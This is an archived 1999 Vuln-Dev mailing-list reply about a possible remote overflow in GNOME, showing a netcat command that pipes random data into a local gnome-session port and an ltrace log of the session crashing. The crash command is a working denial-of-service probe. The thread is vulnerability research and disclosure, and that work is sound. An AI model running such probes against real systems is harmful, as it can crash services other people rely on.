Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com

Neohapsis > Archives > Vuln-Dev> 1999-q4

Exploit-Dev Archives: Re: possible gnome remote overflow

Re: possible gnome remote overflow

kay (kayPHREEDOM.ORG)
Mon, 25 Oct 1999 13:45:59 +0300

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Next message: Kelvin Fu: "forged packets?"
Previous message: Josh Burns: "Re: IE 5.0 vulnerability"
Maybe in reply to: Josh Burns: "IE 5.0 vulnerability"

On Mon, Oct 25, 1999 at 09:40:01AM +0300, Taneli Huuskonen wrote:
> > # dd if=/dev/urandom count=1048576 ibs=1024 | nc localhost 1029
> > [...]
>
> The original poster said it would require sending the Gnome output back
> to Gnome, so you should have a second "| nc localhost 1029" there.

Oops.. my fault.

This time gnome-session crashed:

$ ps xaw|grep gnome-session
783 ? S 0:00 /usr/bin/gnome-session --purge-delay=2500
$ ltrace -p 783 2> gnome-session.trace &

# dd if=/dev/urandom count=1048576 ibs=1024 | nc localhost 1063 \
| nc localhost 1063
39+0 records in
76+0 records out
Broken pipe

gnome-session.trace:

IceAcceptConnection(0x080541b0, 0xbffff9a8, 0, 0x0056a4d6, 0x003ad418 <unfinished ...>
g_malloc0(12, 0x005f2420, 0xbffff90c, 0x0056a43c, 0x002542c4) = 0x080848e8
g_slist_append(0, 0x080848e8, 0xbffff90c, 0x0804de46, 12) = 0x08082748
gtk_main_iteration(0x003ad418, 0x005f2420, 80, 0x001fbcb8, 0xbffff9dc) = 0
IceConnectionStatus(0x08086cf0, 0xbffff9a8, 0xbffff9ac, 0x0804de16, 0x003ad418)
= 2
IceAcceptConnection(0x080541b0, 0xbffff9a8, 0, 0x0056a4d6, 0x003ad418 <unfinished ...>
g_malloc0(12, 0x005f2420, 0xbffff90c, 0x0056a43c, 0x002542c4) = 0x08080898
g_slist_append(0x08082748, 0x08080898, 0xbffff90c, 0x0804de46, 12) = 0x08082748
gtk_main_iteration(0x003ad418, 0x005f2420, 88, 0x001fbcb8, 0xbffff9dc) = 0
IceConnectionStatus(0x08084958, 0xbffff9a8, 0xbffff9ac, 0x0804de16, 0x003ad418)
= 0
gtk_main_iteration(0x003ad418, 0x005f2420, 88, 0x001fbcb8, 0xbffff9dc) = 0
IceConnectionStatus(0x08084958, 0xbffff9a8, 0xbffff9ac, 0x0804de16, 0x003ad418)
= 0
gtk_main_iteration(0x003ad418, 0x005f2420, 88, 0x001fbcb8, 0xbffff9dc <unfinished ...>
__deregister_frame_info(0x080538e0, 80, 0xbffff68c, 0x00385e8c, 0x08068088) = 0x08053d30
+++ exited (status 1) +++

--
key ID: 1024D/F00A7E3F (DSS)    user ID: kay <kayphreedom.org>
fingerprint: DDCC 1A8C 30C5 8C7B C7E3  8808 02C3 1A5D F00A 7E3F

Next message: Kelvin Fu: "forged packets?"
Previous message: Josh Burns: "Re: IE 5.0 vulnerability"
Maybe in reply to: Josh Burns: "IE 5.0 vulnerability"

This archive was generated by hypermail 2.0b3 on Mon Oct 25 1999 - 11:47:08 CDT